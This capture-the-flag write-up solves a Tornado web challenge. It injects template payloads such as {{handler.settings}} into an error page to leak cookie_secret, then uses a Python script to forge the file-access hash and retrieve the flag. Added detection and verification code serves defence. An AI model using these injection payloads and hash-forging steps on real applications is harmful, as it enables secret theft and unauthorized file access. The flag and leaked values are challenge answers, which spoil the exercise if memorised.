The application renders pages through a render function.
The value of cookie_secret is needed.
First, visit /fllllllllllllag.
It shows error?msg=Error, which suggests the server-side template is vulnerable to template injection (SSTI).
Verify with /error?msg={{datetime}}.
Then craft a payload to obtain cookie_secret:
/error?msg={{handler.settings}}
'cookie_secret': 'b94dd73c-a043-429c-9725-33525b0c2c3f'
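The two probes above ({{datetime}} and {{handler.settings}}) are what a defender would look for in access logs: template delimiters arriving inside a query string. The following detection snippet is an added example, not code from the write-up or the challenge; the log format (client, request target, status) and the sample lines are constructed here.

```python
import re
from urllib.parse import urlsplit, unquote

# Delimiters of Tornado-style (and Jinja-style) templates: {{ expr }}, {% stmt %}, {# comment #}
TEMPLATE_DELIMS = re.compile(r"\{\{.*?\}\}|\{%.*?%\}|\{#.*?#\}", re.S)


def find_ssti_probes(log_lines):
    """Return (path, decoded_query, matched_fragment) for every request whose
    query string carries template syntax after URL-decoding."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        target = parts[1]                  # constructed format: <client> <request-target> <status>
        url = urlsplit(target)
        query = unquote(url.query)         # payloads normally arrive percent-encoded
        match = TEMPLATE_DELIMS.search(query)
        if match:
            hits.append((url.path, query, match.group(0)))
    return hits


# Constructed sample log: a benign error page, the two probes from the write-up, and a file request
SAMPLE_LOG = [
    "203.0.113.5 /error?msg=Error 200",
    "203.0.113.5 /error?msg=%7B%7Bdatetime%7D%7D 200",
    "203.0.113.5 /error?msg=%7B%7Bhandler.settings%7D%7D 200",
    "198.51.100.7 /file?filename=/fllllllllllllag&filehash=98b9cc951e0ba6127178cabbbe904517 200",
]

if __name__ == "__main__":
    for path, query, fragment in find_ssti_probes(SAMPLE_LOG):
        print(f"template syntax in query to {path}: {fragment!r} (full query: {query!r})")
```

The second probe is the dangerous one: in a Tornado template the `handler` object is in scope, so `handler.settings` exposes the whole application settings dictionary, cookie_secret included. The underlying fix is to pass the error message to the template as a variable (where autoescaping applies) rather than compiling request-controlled text as template source.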
Compute the filehash value. The Python 2 script is as follows (with .encode() added so it also runs under Python 3):
# -*- coding: UTF-8 -*-
import hashlib


def md5(s):
    # Hex MD5 digest of a string; encode so the same code runs on Python 2 and 3
    m = hashlib.md5()
    m.update(s.encode('utf-8'))
    return m.hexdigest()


def filehash():
    # filehash = md5(cookie_secret + md5(filename)), using the leaked cookie_secret
    filename = '/fllllllllllllag'
    cookie_secret = 'b94dd73c-a043-429c-9725-33525b0c2c3f'
    print(md5(cookie_secret + md5(filename)))


if __name__ == '__main__':
    filehash()
Payload: file?filename=/fllllllllllllag&filehash=98b9cc951e0ba6127178cabbbe904517
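Seen from the server side, the filehash check the script reverses is md5(cookie_secret + md5(filename)): a secret-prefix construction whose entire strength is the secrecy of cookie_secret, which the template injection above leaks. The verifier below is an added example, not the challenge's code; it implements that same scheme with a constant-time comparison, and the secret and filename used in the usage call are constructed placeholders.

```python
import hashlib
import hmac


def md5_hex(s):
    """Hex MD5 of a str (UTF-8 encoded)."""
    return hashlib.md5(s.encode("utf-8")).hexdigest()


def compute_filehash(cookie_secret, filename):
    """The scheme from the write-up: md5(cookie_secret + md5(filename))."""
    return md5_hex(cookie_secret + md5_hex(filename))


def verify_filehash(cookie_secret, filename, supplied):
    """Server-side check. compare_digest avoids a timing side channel on the
    comparison itself; it does nothing for the secret once that has leaked."""
    if not isinstance(supplied, str) or len(supplied) != 32:
        return False
    expected = compute_filehash(cookie_secret, filename)
    return hmac.compare_digest(expected, supplied.lower())


if __name__ == "__main__":
    # constructed values, not the challenge's secret
    secret = "example-cookie-secret"
    name = "/example-file"
    tag = compute_filehash(secret, name)
    print(tag, verify_filehash(secret, name, tag), verify_filehash(secret, name, "0" * 32))
```

Anything that can read the settings dictionary (a template expression, a debug endpoint, a stack trace) can produce a valid tag for any filename, which is exactly the path the write-up takes.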
flag{fa3723e4-77f8-42a5-b358-efdb7bfd2230}